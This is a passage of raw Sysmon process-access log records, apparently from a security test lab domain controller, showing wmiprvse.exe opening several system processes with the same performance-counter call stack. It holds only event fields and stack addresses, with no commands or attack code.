TEM32\ntdll.dll+51791 10341000x80000000000000005756Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005755Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005754Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005753Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005752Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005751Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005750Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005749Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005748Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005747Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005746Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005745Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005744Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005743Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2300-000000009101}3016C:\Windows\servicing\TrustedInstaller.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005742Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005741Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8545-5FCF-2200-000000009101}2868C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005740Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005739Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-2000-000000009101}2400C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005738Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005737Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1F00-000000009101}2316C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005736Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005735Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1E00-000000009101}2308C:\Windows\system32\compattelrunner.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005734Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005733Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:46.156{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005732Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 